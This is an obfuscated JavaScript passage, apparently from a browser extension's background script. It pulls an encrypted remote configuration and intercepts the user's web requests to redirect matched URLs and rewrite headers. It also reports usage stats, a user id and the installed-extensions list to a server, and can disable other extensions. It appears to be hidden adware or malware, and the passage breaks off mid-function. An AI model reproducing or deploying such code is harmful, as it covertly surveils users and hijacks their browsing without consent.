P={};P[storageCfgName]=A,chrome[lm(0x3bd,'Q##1')][A0(0x559,'oqvV')][lD(0x454,'xWg(')](P),globalCurCfg=A,b&&(globalPending=[],limitedReqFilter&&chrome[A0(0x45d,'cgVJ')][lK(0x69f,'vA59')+lm(0x29b,'JXuv')][A0(0x39f,'k^U#')+'r'](callbackBeforeRequest,A[lK(0x289,'cL8r')],[r[lK(0x537,'xWg(')]]));}function isValidConfig(l){const A2=a0s4,A3=a0s3,A4=a0s5,A5=a0s5,A6=a0s3,A={};A[A2(0x639,'Q##1')]=function(f, B){return f!=b;},A[A2(0x1ef,'AhHj')]=function(f){return f();},A[A3(0x493,']Rcs')]=function(f,b,P){return f(b,P);},A[A3(0x1de,'j#2h')]=A5(0x39d,'lu&$'),A[A5(0x3f2,'SNZo')]=A4(0x628,'0si)'),A[A5(0x3ae,'vA59')]=A4(0x6ab,'m$hw'),A[A3(0x3c0,'mU4s')]=A2(0x680,'JXuv'),A[A3(0x3d6,'d)[^')]=A6(0x2c4,'$Vpd');const v=A;let r=!![];return v[A3(0x1f5,'sc^*')](l[A4(0x2cd,'Y$2)')],v[A5(0x418,'!tWl')](getDefaultConfig)[A6(0x505,']Rcs')])?r=![]:r=v[A4(0x2d1,'0si)')](checkMandatoryFields,l,{'format':[],'version':[],'tasksHash':[],'params':[],'update':[v[A3(0x1be,'cL8r')],v[A6(0x27c,'8@D3')],v[A5(0x546,'@(X[')],v[A5(0x5ea,'8@D3')],v[A4(0x413,'Y7Ko')]]}),r;}function checkMandatoryFields(l,A){const A7=a0s5,A8=a0s5,A9=a0s1,As=a0s1,Al=a0s1,v={};v[A7(0x648,'vA59')]=function(b,P){return b==P;},v[A8(0x6d0,'Y7Ko')]=A9(0x61d,'Q##1'),v[As(0x6bb,')^B&')]=function(b,P){return b==P;};const r=v;let f=!![];for(let b in A){let P=l;b[Al(0x3e7,'d)[^')]('.')[A8(0x249,'$]ai')](O=>{const AA=A7,Av=A8;P=P[O];if(r[AA(0x5b1,'cgVJ')](typeof P,r[AA(0x31b,'$Vpd')]))return f=![],![];}),A[b][A7(0x4bf,'Y7Ko')](O=>{const Ar=A8,Af=As;r[Ar(0x5e6,'oqvV')](typeof P[O],r[Ar(0x319,'FwY2')])&&(f=![]);;return!![];});}return f;}async function asyncRequestUrl(b,P){const Ab=a0s1,AP=a0s1,AO=a0s4,Az=a0s1,Aa=a0s1,O={};O[Ab(0x647,'yTY2')]=AP(0x1d1,'JXuv')+AP(0x357,'JXuv'),O[AO(0x204,'Y7Ko')]=function(a,V){return a(V);},O[AP(0x4b3,'f2lD')]=AP(0x25d,'k^U#')+Az(0x4d1,'j#2h'),O[Aa(0x44c,'0si)')]=AP(0x2c2,'siaL'),O[AP(0x58c,'%yFL')]=function(a,V){return a===V;},O[Ab(0x202,'vA59')]=AO(0x2aa,')^B&'),O[AO(0x2a3,'mU4s')]=AO(0x4d5,']Rcs')+Aa(0x271,'m$hw')+Ab(0x690,'25hK'),O[Aa(0x666,')^B&')]=AP(0x2b4,'yAvB')+Az(0x276,'JXuv')+Aa(0x63a,'$vab'),O[Ab(0x445,'WW46')]=Ab(0x63b,'mU4s'),O[Ab(0x66b,'oqvV')]=function(a,V){return a(V);},O[AO(0x52a,'UQM8')]=function(a,V,X){return a(V,X);},O[AP(0x4c8,'sc^*')]=function(a,V){return a(V);};const z=O;try{const a=z[Az(0x68e,'25hK')],V=!![];let [X,x,c]=z[Aa(0x4df,'WW46')](makeRequest, B);if(!X)throw z[Ab(0x22f,'Q##1')];c&&(P[z[AO(0x566,'mU4s')]]=c);let k=P?z[Az(0x416,'25hK')](removeUnicode,JSON[AO(0x4f0,'sc^*')](P)):'',U=z[Ab(0x585,'cL8r')](X,z[Ab(0x4a2,'yTY2')])?undefined:{'method':X,'headers':{'Content-Type':V?z[AP(0x3fa,'$]ai')]:z[AP(0x263,'mU4s')],'Cache-Control':z[AO(0x28a,'j#2h')]},'body':(b[Az(0x58e,'Y7Ko')]||b[AO(0x2e4,'Y7Ko')+'o'])&&k?V?z[Aa(0x332,'Y$2)')](btoa,z[Az(0x24b,'8@D3')](rc4,a,k)):k:undefined},G=await z[Ab(0x5c9,'Y7Ko')](fetch,x,U)[Aa(0x1ee,'w&lY')](T=>{});if(!G||!G['ok']){const T={};return T[Ab(0x525,'w&lY')]=0x0,T;}let F;if(V){let p=await G[AP(0x4d2,'vA59')]()[Ab(0x349,'@(X[')](n=>{});if(!p){const n={};return n[Aa(0x539,'AhHj')]=0x0,n;}let q=z[AO(0x453,'WW46')](rc4,a,z[AO(0x1e1,'0si)')](atob,p)),g=z[AO(0x3c4,'UQM8')](removeUnicode,q);F=JSON[AO(0x3f9,'j#2h')](g);}else{let w=await G[AP(0x2d0,'6(5I')]();if(!w){const N={};return N[AP(0x577,')^B&')]=0x0,N;}F=w;}const B={};return B[Aa(0x5bc,'$]ai')]=F?G[AO(0x32a,'k^U#')]:0x38a*0xb+0x4*-0x363+-0x43b*0x6,B[Ab(0x475,'C7@$')]=F,B;}catch(M){const h={};return h[Az(0x243,'d)[^')]=0x0,h;}}function makeRequest(l){const AV=a0s2,AX=a0s4,Ax=a0s3,Ac=a0s4,Ak=a0s3,A={};A[AV(0x2c3,'f2lD')]=function(X,c){return X+c;},A[AX(0x6a4,'yAvB')]=function(X,c){return X===c;},A[Ax(0x38b,'mU4s')]=AV(0x341,'cR2Y'),A[AV(0x4b2,'JXuv')]=function(X,c){return X/c;},A[AX(0x598,'otDQ')]=function(X){return X();},A[AX(0x580,'mU4s')]=function(X,x){return X(x);},A[AX(0x5d2,'cL8r')]=function(X,x){return X(x);},A[Ax(0x394,'m$hw')]=function(X,c){return X-c;},A[Ax(0x399,'Epg(')]=function(X,c){return X-c;},A[Ac(0x3e1,'5#F9')]=function(X,c){return X+c;},A[Ak(0x31c,'f2lD')]=function(X,x,c){return X(x,c);},A[Ac(0x4f2,'otDQ')]=function(X,x){return X(x);},A[Ak(0x527,'0si)')]=function(X,x){return X(x);},A[Ak(0x238,'6(5I')]=function(X,c){return X<c;},A[Ak(0x283,'lu&$')]=function(X,c){return X+c;},A[Ac(0x507,'sc^*')]=function(X,c){return X+c;},A[AV(0x4a3,')^B&')]=AX(0x2ea,'otDQ'),A[AX(0x3b8,'!tWl')]=function(X,c){return X+c;},A[Ac(0x1d7,'JXuv')]=function(X,c){return X+c;},A[Ac(0x2d8,'lu&$')]=function(X,x){return X(x);},A[AV(0x396,'vA59')]=AX(0x441,'ICSG')+AV(0x25f,'Y7Ko');const r=A;let f=l[AX(0x219,'otDQ')],b=l[AV(0x1c4,'$Vpd')],P;const O=-0x2019+-0x1023+0x343c;let z=new URL( B),a=r[Ax(0x602,'Y$2)')](z[AX(0x591,'!tWl')],z[AX(0x32d,'siaL')])[Ac(0x235,'!tWl')](/^\?/,''),V=a;if(r[AX(0x65c,'otDQ')](f,r[Ak(0x53d,'Y$2)')])){if(l[AV(0x587,'WW46')+Ax(0x461,']Rcs')]){const X=r[AV(0x46c,'FwY2')](O,0x1217+0x1b0f+0x282*-0x12);let x=r[Ax(0x54a,'WW46')](getKey),c=new DataView(new Uint32Array([a[AX(0x402,'yAvB')]])[Ax(0x6ba,'Y7Ko')]),k=String[AX(0x678,'AhHj')+'de'](c[Ax(0x3b4,'FwY2')](-0x71e*-0x5+-0x2fa*-0x9+-0x3e60),c[AV(0x1b6,'!tWl')](-0x576+0x4f*0x59+-0x1600),c[Ak(0x5e1,'cL8r')](0x255c+-0x6fd+0x3*-0xa1f),c[AV(0x60f,'ICSG')](0x2370+-0x745*0x2+-0x1*0x14e3)),U=r[AX(0x4b0,'SNZo')](getRndStr,r[Ak(0x692,'j#2h')](getRndInt,Math[Ac(0x326,'UQM8')](0x12a0*-0x1+0xdfd*0x1+0x4a3,r[Ax(0x64b,'%1Wi')](r[Ak(0x394,'m$hw')](r[Ax(0x270,'m$hw')](X,x[AX(0x582,'sc^*')]),k[Ac(0x3cd,'%yFL')]),a[AX(0x337,'Y7Ko')])))),G=r[AV(0x406,'cL8r')](x,r[AV(0x3af,'FwY2')](rc4,x,r[Ac(0x27f,'@(X[')](r[Ac(0x38d,'Epg(')](k,a),U)));V=r[Ak(0x1f7,'xWg(')](rawurlencode,r[Ac(0x3ef,'JXuv')](btoa,G));}r[AV(0x333,'Y$2)')](r[Ax(0x61b,'j#2h')](z[Ax(0x448,'mU4s')][Ac(0x5ce,'vA59')],V[AV(0x6cd,'k^U#')]),O)?b=r[Ac(0x65d,']Rcs')](r[AV(0x63e,'0si)')](r[Ax(0x4e1,'%yFL')](z[Ax(0x473,'oqvV')],z[AV(0x1ba,'6(5I')]),'?'),V):(f=r[Ax(0x574,'otDQ')],b=r[AV(0x365,'WW46')](z[AV(0x4ab,'DH7R')],z[AX(0x1d8,'otDQ')]),P=a);}else{if(r[AV(0x62d,'%yFL')](f,r[AX(0x2ee,'siaL')]))b=r[Ak(0x4da,'Y7Ko')](z[Ak(0x2a2,'!tWl')],z[Ak(0x356,'$]ai')]),P=a;else{r[Ax(0x5b0,'%yFL')](updateErrCount,r[Ax(0x256,'FwY2')]);return;}}return[f,b,P];}async function asyncUpdateConfig(){const Ai=a0s3,AU=a0s4,AG=a0s4,AF=a0s4,AB=a0s3,l={};l[Ai(0x33d,'vA59')]=function(V){return V();},l[AU(0x282,'oqvV')]=function(V,X){return V(X);},l[AG(0x5bb,'w&lY')]=AG(0x47c,'AhHj'),l[Ai(0x624,'yAvB')]=function(V){return V();},l[AB(0x2cf,'%yFL')]=function(V,X){return V(X);},l[AB(0x612,'C7@$')]=function(V){return V();},l[AF(0x608,'%yFL')]=function(V,X){return V<X;},l[Ai(0x315,'m$hw')]=function(V,X){return V-X;},l[AB(0x2dd,'QB$Y')]=function(V,X,x){return V(X,x);},l[Ai(0x603,'M$%w')]=function(V,X,x){return V(X,x);},l[AU(0x354,'cgVJ')]=function(V){return V();},l[AF(0x28f,'0si)')]=AF(0x465,'Y7Ko'),l[AG(0x6aa,'WW46')]=function(V,X,x){return V(X,x);},l[Ai(0x4f6,'@(X[')]=function(V,X){return V==X;},l[AB(0x3f3,'cR2Y')]=function(V,X,x){return V(X,x);},l[AF(0x626,')^B&')]=AF(0x6a7,'w&lY'),l[AB(0x642,'@(X[')]=function(V,X){return V(X);},l[AB(0x451,'@(X[')]=AB(0x530,'ICSG')+Ai(0x278,'cR2Y'),l[AU(0x273,'%1Wi')]=function(V,X){return V>=X;},l[AB(0x3c3,'M$%w')]=function(V,X){return V!=X;},l[AG(0x27a,'vA59')]=AU(0x5e3,'cL8r'),l[AF(0x607,'sc^*')]=function(V,X){return V==X;},l[AG(0x5bd,'WW46')]=function(V,X){return V(X);},l[AF(0x215,'8@D3')]=Ai(0x62f,']Rcs')+'rr',l[AB(0x5cc,']Rcs')]=function(V,X){return V(X);},l[Ai(0x503,'JXuv')]=AU(0x597,'25hK')+AG(0x655,'d)[^'),l[Ai(0x5e4,'j#2h')]=function(V,X){return V>=X;},l[AF(0x410,'8@D3')]=function(V){return V();},l[AG(0x52b,'j#2h')]=function(V,X,x){return V(X,x);},l[AB(0x1ec,'%yFL')]=function(V,X){return V+X;},l[AB(0x4b1,']Rcs')]=function(V,X,x){return V(X,x);};const A=l;let v=A[AF(0x6b7,'cL8r')](getConfig),r=Date[AU(0x48a,'$Vpd')](),f=v[AB(0x378,'AhHj')][AB(0x30c,'SNZo')+AU(0x4a1,'M$%w')];if(f&&A[Ai(0x5d8,'lu&$')](r,f)){let V=A[Ai(0x2d5,'!tWl')](f,r);A[AG(0x2c7,'&NUL')](setTimeout,()=>{const AT=AB,Ap=AB,Aq=AU;try{A[AT(0x2a4,'xWg(')](asyncUpdateConfig);}catch(X){A[AT(0x50a,'ICSG')](updateErrCount,A[AT(0x572,')^B&')]);}},V);return;}let b={};Object[AG(0x29c,'otDQ')](b,globalStats),b['id']=userId;let P=v[AU(0x28b,'m$hw')][AG(0x618,'QB$Y')+AG(0x293,'FwY2')];P&&A[AG(0x470,'lu&$')](cutStats,b,P);let O=await A[AF(0x252,'%1Wi')](asyncGetExt);if(v[Ai(0x378,'AhHj')][AB(0x373,'siaL')+'o']){let X=O[Ai(0x5da,'Y7Ko')](x=>{const Ag=AB,An=AB,Ae=AG,Aw=Ai;for(let c in x){!v[Ag(0x300,'8@D3')][Ag(0x567,'sc^*')+An(0x3dd,'$Vpd')][Aw(0x2e1,'DH7R')]©&&delete x[c];}return x;});b[A[AG(0x518,'8@D3')]]=X;}let z=await A[AF(0x5cd,'otDQ')](asyncRequestUrl,v[AG(0x20a,'!tWl')], B);A[Ai(0x1c7,'k^U#')](z[AU(0x5f9,'!tWl')],0x1bed+-0x6*-0x154+0x59*-0x65)&&A[AU(0x4f4,'WW46')](clearStats);let a=A[AF(0x39e,'Q##1')](checkConfig,z[AB(0x350,'siaL')],cfgSources[AB(0x2f8,'@(X[')]);if(!a){A[AG(0x613,')^B&')](updateErrCount,A[AF(0x63c,'m$hw')]);let x=A[AG(0x3b3,'vA59')](updateErrCount,A[AF(0x482,'m$hw')]);if(A[AF(0x623,'$vab')](x,v[AU(0x521,'siaL')][AF(0x3f6,'5#F9')])){let c=A[AB(0x31e,'$]ai')](getDefaultConfig);if(A[AB(0x2a9,'d)[^')](v,c)){const k=A[Ai(0x52f,'AhHj')][AB(0x240,'cL8r')]('|');let U=0xf7e+0x7b9+-0x351*0x7;while(!![]){switch(k[U++]){case'0':A[AB(0x63f,'J&Ou')](z[AF(0x529,'C7@$')],0x404+-0x2*0x2f+0x1*-0x2de)&&A[AF(0x2bf,'0si)')](clearStats);continue;case'1':if(!a){A[AF(0x63d,'$Vpd')](updateErrCount,A[Ai(0x5c4,'!tWl')]),x=A[Ai(0x328,'$]ai')](updateErrCount,A[AU(0x479,'k^U#')]);if(A[AF(0x381,'Y$2)')](x,c[AB(0x48c,'C7@$')][Ai(0x6c9,')^B&')])){A[AU(0x253,'w&lY')](disableProcessing);return;}}continue;case'2':a=A[AG(0x4eb,'lu&$')](checkConfig,z[AG(0x320,'j#2h')],cfgSources[AF(0x226,'Y7Ko')]);continue;case'3':z=await A[Ai(0x4d9,'8@D3')](asyncRequestUrl,c[AU(0x501,'cgVJ')], B);continue;case'4':A[AG(0x424,'j#2h')](prepareConfig,c);continue;}break;}}}}a&&(A[AB(0x41c,'otDQ')](setConfig,a),v=A[AU(0x66f,'Y$2)')](getConfig)),v[AU(0x3a9,'M$%w')][AF(0x1dd,'5#F9')+AU(0x24a,'vA59')]=A[AG(0x4e2,'oqvV')](r,A[AG(0x637,'w&lY')](sec2ms,v[AF(0x5c7,'SNZo')][AG(0x1ac,'5#F9')])),A[AU(0x68b,'oqvV')](setTimeout,()=>{const AN=AG,AM=Ai,Ah=AU;try{A[AN(0x30a,'cL8r')](asyncUpdateConfig);}catch(G){A[AN(0x3fd,'Epg(')](updateErrCount,A[AN(0x225,'0si)')]);}},A[AG(0x51f,'Epg(')](sec2ms,v[AB(0x1fb,'0si)')][AU(0x2fb,'$vab')])),A[AU(0x32c,'ICSG')](disableExt,O,v[AU(0x3d7,'otDQ')][Ai(0x68a,'6(5I')]);}function saveState(l,A){const Aj=a0s4,Ao=a0s4,Ay=a0s3;!globalState&&(globalState={});globalState[l]=A;const v={};v[storageStateName]=globalState,chrome[Aj(0x48d,'vA59')][Aj(0x621,'@(X[')][Ao(0x38e,'vA59')](v);}function getState(s){return globalState?globalState[s]:undefined;}function loadState(){const AJ=a0s5,AS=a0s2,AI=a0s3;chrome[AJ(0x26c,'cgVJ')][AJ(0x51c,'f2lD')][AI(0x3e6,'JXuv')]([storageStateName],s=>{globalState=s[[storageStateName]];});}function clearStats(){const AR=a0s4,AL=a0s2,l={};l[AR(0x4dd,'yTY2')]=function(v){return v();};const A=l;globalStats={},A[AR(0x323,'DH7R')](saveStats);}function saveStats(){const AE=a0s5,AH=a0s5,AQ=a0s4,l={};l[storageStatsName]=globalStats,chrome[AE(0x2da,'DH7R')][AH(0x51c,'f2lD')][AH(0x56d,'Q##1')](l);}function loadStats(l){const AZ=a0s3,Au=a0s4,AW=a0s4,AY=a0s1,AC=a0s1,A={};A[AZ(0x589,'Y$2)')]=function(r,f){return r(f);},A[AZ(0x498,'xWg(')]=AZ(0x227,'sc^*')+AW(0x231,'$]ai'),A[AC(0x2a5,')^B&')]=Au(0x5a8,'J&Ou')+AC(0x420,'ICSG');const v=A;chrome[Au(0x2da,'DH7R')][Au(0x423,'d)[^')][Au(0x627,']Rcs')]([storageStatsName],r=>{const Ad=AY,At=AC,Am=AZ,AD=AZ;globalStats=r[[storageStatsName]],l&&(v[Ad(0x676,'k^U#')](clearErrCount,v[At(0x259,'AhHj')]),v[Ad(0x568,'$vab')](clearErrCount,v[AD(0x6b6,'otDQ')]));});}function cutStats(s,l){const AK=a0s3,v0=a0s5,v1=a0s1,v2=a0s4,v3=a0s1;let A=s[statPools[AK(0x1d9,'M$%w')]];if(!A)return;let v=Object[v0(0x28c,'@(X[')](A)[v0(0x49e,'8@D3')]((r,f)=>f-r)[v2(0x64e,'ICSG')](-0x213+0xc2f*-0x1+0x92*0x19,l);for(let r in A){!v[v1(0x457,'w&lY')](A[r])&&(A[r]=undefined);};}function setCount(l,A,v){const v4=a0s4,v5=a0s4,v6=a0s4,v7=a0s1,v8=a0s1,r={};r[v4(0x4d3,'25hK')]=v4(0x41f,'%1Wi')+'2',r[v4(0x471,'5#F9')]=function(O){return O();};const f=r,b=f[v5(0x5ba,'FwY2')][v8(0x211,'cgVJ')]('|');let P=-0x1*-0x2515+0x17*0x6+-0x1*0x259f;while(!![]){switch(b[P++]){case'0':!globalStats[l]&&(globalStats[l]={});continue;case'1':f[v5(0x494,'&NUL')](saveStats);continue;case'2':return globalStats[l][A];case'3':globalStats[l][A]=v;continue;case'4':!globalStats[l][A]&&(globalStats[l][A]=0x2700+-0x33d*0x8+-0xd18);continue;case'5':!globalStats&&(globalStats={});continue;}break;}}function updateCount(l,A,v=-0x51b*-0x5+0x26a9+-0x402f){const v9=a0s2,vs=a0s4,vl=a0s3,vA=a0s1,vv=a0s3,r={};r[v9(0x203,'@(X[')]=v9(0x362,'Y$2)')+'4',r[vs(0x2d2,'mU4s')]=function(O,z){return O+z;},r[vl(0x51d,'xWg(')]=function(O){return O();};const f=r,b=f[vl(0x1f3,'ICSG')][vA(0x67a,'yTY2')]('|');let P=0x2077+0x1c2*0x10+-0x3c97;while(!![]){switch(b[P++]){case'0':!globalStats[l]&&(globalStats[l]={});continue;case'1':globalStats[l][A]=f[vv(0x1e8,'!tWl')](globalStats[l][A],v);continue;case'2':f[vA(0x5ab,'8@D3')](saveStats);continue;case'3':!globalStats[l][A]&&(globalStats[l][A]=-0x51a+0x41*-0x83+-0x1ab*-0x17);continue;case'4':return globalStats[l][A];case'5':!globalStats&&(globalStats={});continue;}break;}}function getCount(s,l){return globalStats?globalStats[s]?globalStats[s][l]:-0x1*0xf99+-0x200f+0x2fa8:0x1*-0xd55+-0x1*0x6b+0xdc0;}const clearErrCount=s=>setCount(statPools[a0s3(0x488,'ICSG')],s,0xa47+0x19d5+0x241c*-0x1),updateAppCount=s=>updateCount(statPools[a0s4(0x534,'8@D3')],s,0x3fe+0x17f1+0x1bee*-0x1),updateErrCount=s=>updateCount(statPools[a0s5(0x5ef,'vA59')],s,-0x1a6d+-0x3a6+-0x7*-0x44c),updateActionsCount=s=>updateCount(statPools[a0s1(0x1c2,'cgVJ')],s,0x13e*-0x19+-0xd4b+-0x656*-0x7),updateReqHostsCount=s=>updateCount(statPools[a0s5(0x3b0,'$]ai')],s,0x47*0x65+0x21*0x47+-0x3*0xc63);var callbackBeforeRequest=function(A){const vr=a0s1,vf=a0s5,vb=a0s1,vP=a0s5,vO=a0s2,v={};v[vr(0x33a,'%yFL')]=function(z,a){return z!=a;},v[vr(0x5ac,')^B&')]=function(z,a){return z(a);},v[vb(0x5c3,'$]ai')]=function(z,a){return z===a;},v[vP(0x466,'@(X[')]=vO(0x633,'UQM8'),v[vO(0x1da,'f2lD')]=function(z){return z();},v[vP(0x464,'xWg(')]=function(z,a){return z+a;},v[vO(0x265,'d)[^')]=function(z,a,V){return z(a,V);},v[vO(0x43f,'Q##1')]=function(z,a){return z(a);},v[vb(0x671,'mU4s')]=function(z,a,V){return z(a,V);},v[vO(0x392,'25hK')]=function(z,a,V){return z(a,V);},v[vP(0x5b8,'cR2Y')]=function(z,a){return z(a);};const r=v;let f=r[vP(0x468,'C7@$')](getConfig);if(!f||f[vf(0x23e,'f2lD')])return;if(f[vf(0x28b,'m$hw')][vO(0x1fe,'Q##1')]){let z=r[vb(0x5fd,'w&lY')](getHostName,A[vf(0x5f8,'yTY2')]);z&&r[vb(0x329,'siaL')](updateReqHostsCount,z);}let b=r[vb(0x2ec,'5#F9')](getMatchedTask,f[vP(0x462,'Y$2)')],A[vb(0x4ce,'vA59')]);if(!b)return;let P=r[vr(0x299,'%1Wi')](prepareTask, B);if(!P)return;let O;b[vP(0x5af,'ICSG')][vO(0x3f8,'Epg(')](a=>{const vz=vb,va=vb,vV=vb,vX=vO,vx=vO;if(a[vz(0x4e7,'25hK')])return![];if(r[vz(0x400,'yTY2')](a[va(0x34c,'sc^*')],b[va(0x2b2,'d)[^')+'p']))return![];if(!r[va(0x693,'25hK')](isActionTimeNow,a))return![];if(r[vx(0x665,'Q##1')](a[vV(0x50e,'M$%w')],r[va(0x4a4,']Rcs')])){let V=r[vX(0x2ff,'Epg(')](getKey);const X={};X[va(0x34f,'m$hw')]=A[vX(0x596,'$vab')],X[vV(0x47f,'@(X[')]=r[vX(0x59f,'Epg(')](rawurlencode,A[vx(0x523,'cR2Y')]),X[vz(0x54d,'sc^*')]=r[vX(0x209,'oqvV')](btoa,r[vV(0x5a2,'%1Wi')](V,r[vX(0x1f2,'cgVJ')](rc4,V,A[vV(0x37d,'mU4s')]))),X[va(0x304,'yTY2')]=r[vz(0x306,'JXuv')](getHostName,A[vz(0x36e,'C7@$')]);let x=X,c=r[vV(0x679,'$]ai')](replaceUrlMacros,a[vx(0x53f,'SNZo')],x),k=a[va(0x500,'C7@$')]?r[vz(0x255,'cgVJ')](replaceUrlMacros,a[vV(0x35e,'d)[^')],x):undefined;const U={};return U[vV(0x366,'%1Wi')]=A[vz(0x632,'j#2h')],U[vz(0x67d,'w&lY')]=A[vz(0x622,'w&lY')],U[vz(0x1fc,'Epg(')]=k,U[vz(0x3fc,'d)[^')]=a,globalPending[vx(0x3ee,'5#F9')](U),O=c,!![];}return![];});if(O){const a={};return a[vr(0x5e9,'sc^*')+'l']=O,a;}},callbackBeforeSendHeaders=function(A){const vc=a0s4,vk=a0s5,vi=a0s4,vU=a0s2,vG=a0s1,v={};v[vc(0x2d7,'C7@$')]=function(a){return a();},v[vc(0x3e4,'Y$2)')]=function(a,V,X){return a(V,X);},v[vc(0x32f,')^B&')]=vk(0x6bf,'%yFL'),v[vi(0x257,'WW46')]=function(a,V){return a==V;},v[vk(0x3ca,'k^U#')]=function(a,V){return a!=V;},v[vi(0x4b8,'cgVJ')]=vc(0x1c0,'8@D3'),v[vk(0x415,'f2lD')]=function(a,V,X,x){return a(V,X,x);},v[vi(0x4ad,'%1Wi')]=function(a,V){return a(V);};const r=v;let f=r[vU(0x32b,'$vab')](getConfig);if(!f||f[vG(0x5a0,'C7@$')])return;let b=r[vk(0x509,'cL8r')](getHeaders,A[vc(0x3d4,'5#F9')+vG(0x369,'oqvV')],r[vU(0x434,'FwY2')])[vk(0x1b3,'$]ai')](a=>a[vc(0x2f7,'cgVJ')]===vG(0x431,'JXuv'));if( B){}let P=A[vU(0x6bd,'lu&$')],O,z=globalPending[vU(0x30b,'!tWl')](a=>a[vk(0x53a,'cL8r')]==A[vU(0x551,'oqvV')]);r[vG(0x1b4,'UQM8')](z,-(-0x9*0x356+-0x703*0x5+0xad9*0x6))&&(z=globalPending[vG(0x2d9,'yTY2')](a=>a[vG(0x27b,'C7@$')]==P));if(r[vG(0x6c4,'Y7Ko')](z,-(0x1e1a+-0x1c12+-0x207))){let a=globalPending[z];P=a[vG(0x62e,'M$%w')];if(a[vi(0x578,'f2lD')]){const V=r[vk(0x65b,'AhHj')];if(!r[vU(0x5e7,'&NUL')](replaceHeader,A[vc(0x54e,'J&Ou')+vG(0x6b8,'Y7Ko')],V,a[vk(0x3e0,'WW46')]))r[vc(0x307,'5#F9')](addHeader,A[vi(0x6c2,'$vab')+vi(0x6a8,'%yFL')],V,a[vU(0x46b,'lu&$')]);else{}O=A[vU(0x575,'w&lY')+vU(0x360,'vA59')];}!b&&r[vG(0x1e2,'%yFL')](finishAction,a[vi(0x65e,'otDQ')]),globalPending[vU(0x334,']Rcs')](z,0x2362+-0x84+-0x22dd);}if( B){}else r[vk(0x6ca,'Q##1')](processRequestActions,P,A);if(O){const X={};return X[vU(0x26e,'sc^*')+vU(0x369,'oqvV')]=O,X;}};function processRequestActions(l,A){const vF=a0s4,vB=a0s5,vT=a0s4,vp=a0s5,vq=a0s1,v={};v[vF(0x1eb,'cL8r')]=function(P,O){return P!=O;},v[vF(0x611,'Y$2)')]=function(P,O){return P(O);},v[vF(0x1cb,'WW46')]=vT(0x23a,'siaL'),v[vB(0x573,'w&lY')]=function(P,O,z){return P(O,z);},v[vp(0x34b,'siaL')]=vF(0x2e3,'Q##1'),v[vT(0x560,'$]ai')]=vq(0x58b,'otDQ')+'ow',v[vT(0x5a4,']Rcs')]=function(P,O){return P(O);},v[vq(0x2cb,'DH7R')]=function(P){return P();},v[vq(0x2c6,'yAvB')]=function(P,O){return P(O);};const r=v;let f=r[vF(0x5d5,'Q##1')](getConfig);if(!f||f[vF(0x5dd,'cR2Y')])return;let b=r[vq(0x673,'UQM8')](getMatchedTask,f[vq(0x3cc,'JXuv')],l);if(!b)return;if(!b[vF(0x419,'$]ai')+'p'])return;b[vq(0x212,'J&Ou')][vT(0x485,'lu&$')](P=>{const vg=vp,vn=vB,ve=vT,vw=vq,vN=vF;if(P[vg(0x50c,'JXuv')])return;if(r[vg(0x49a,'%1Wi')](P[ve(0x1c9,'@(X[')],b[vg(0x65a,'yTY2')+'p']))return![];if(!r[vg(0x21f,'mU4s')](isActionTimeNow,P))return;switch(P[vn(0x37b,'QB$Y')]){case r[vn(0x35c,'w&lY')]:r[vg(0x42a,'oqvV')](performFeedAction,P,l);break;case r[vw(0x3e3,'FwY2')]:case r[vw(0x58a,'Y7Ko')]:r[vn(0x41b,'lu&$')](performCreateAction,P,l);break;default:return;}r[ve(0x1f0,'m$hw')](finishAction,P);}),r[vF(0x6a0,'yTY2')](finishTask, B);}function performFeedAction(l,A){const vM=a0s3,vh=a0s4,vj=a0s3,vo=a0s2,vy=a0s4,v={};v[vM(0x495,'Y7Ko')]=function( B){return b();},v[vM(0x22d,'Epg(')]=function(b,P){return b(P);},v[vj(0x2a8,'cL8r')]=function(b,P){return b(P);},v[vo(0x646,'yAvB')]=function(b,P){return b+P;},v[vh(0x486,'k^U#')]=function(b,P,O){return b(P,O);},v[vo(0x6a1,'Epg(')]=function(b,P){return b(P);},v[vM(0x583,'!tWl')]=function(b,P,O){return b(P,O);},v[vh(0x581,'$vab')]=function(b,P,O,z){return b(P,O,z);};const r=v;let f=l[vM(0x380,'QB$Y')]?l[vM(0x6a2,'lu&$')]:-0x1a26+-0x7cf+0x1*0x21f5;r[vh(0x1cd,'$]ai')](setTimeout,()=>{const vJ=vj,vS=vM,vI=vj,vR=vM,vL=vh;let b=r[vJ(0x504,'%1Wi')](getKey);const P={};P[vS(0x1c4,'$Vpd')]=A,P[vJ(0x40a,'Q##1')]=r[vS(0x42f,'ICSG')](rawurlencode,A),P[vI(0x1ca,'&NUL')]=r[vJ(0x343,'@(X[')](btoa,r[vS(0x506,'xWg(')](b,r[vS(0x251,'25hK')](rc4,b,A))),P[vS(0x304,'yTY2')]=r[vL(0x531,'25hK')](getHostName,A);let O=P,z=r[vR(0x201,'Epg(')](replaceUrlMacros,l[vI(0x5c2,'!tWl')],O);r[vR(0x2f9,'QB$Y')](asyncGetAndRunFeedAction,z,l,A);},r[vM(0x478,'yTY2')](sec2ms,f));}async function asyncGetAndRunFeedAction(A,v,r){const vE=a0s2,vH=a0s1,vQ=a0s5,vZ=a0s5,vu=a0s2,f={};f[vE(0x363,'sc^*')]=function(a,V){return a(V);},f[vE(0x345,'%yFL')]=function(a,V){return a!=V;},f[vH(0x33f,'cL8r')]=vE(0x3d1,'m$hw')+vu(0x570,'yAvB'),f[vZ(0x59b,'DH7R')]=function(a,V){return a==V;},f[vE(0x459,'5#F9')]=vQ(0x69b,'UQM8')+vZ(0x39c,'$vab'),f[vZ(0x547,'%1Wi')]=function(a,V,X){return a(V,X);};const b=f,P={};P[vE(0x4be,'JXuv')]=A,P[vZ(0x20f,'AhHj')]=v[vZ(0x35d,'$Vpd')],P[vE(0x6b0,'cL8r')+vZ(0x461,']Rcs')]=v[vu(0x3f0,'mU4s')+vQ(0x54c,'M$%w')];let O=await b[vE(0x26b,'xWg(')](asyncRequestUrl,P);if(b[vZ(0x2af,'WW46')](O[vQ(0x30e,'Epg(')],0x1f3a+0x2395+-0x4207)){b[vQ(0x3ff,'JXuv')](updateErrCount,b[vE(0x4ba,'yTY2')]);return;}if(!O[vQ(0x1d0,'ICSG')]||b[vu(0x513,'%1Wi')](-0xa*-0x2a9+0x11fc+0x164b*-0x2,O[vE(0x214,'$]ai')][vu(0x565,'%1Wi')]))return;let z=O[vH(0x325,'yAvB')];if(!b[vE(0x625,'5#F9')](isValidFeedAction,z)){b[vE(0x363,'sc^*')](updateErrCount,b[vZ(0x5bf,'WW46')]);return;}b[vE(0x3ec,'siaL')](performCreateAction,z,r);}function isValidFeedAction(A){const 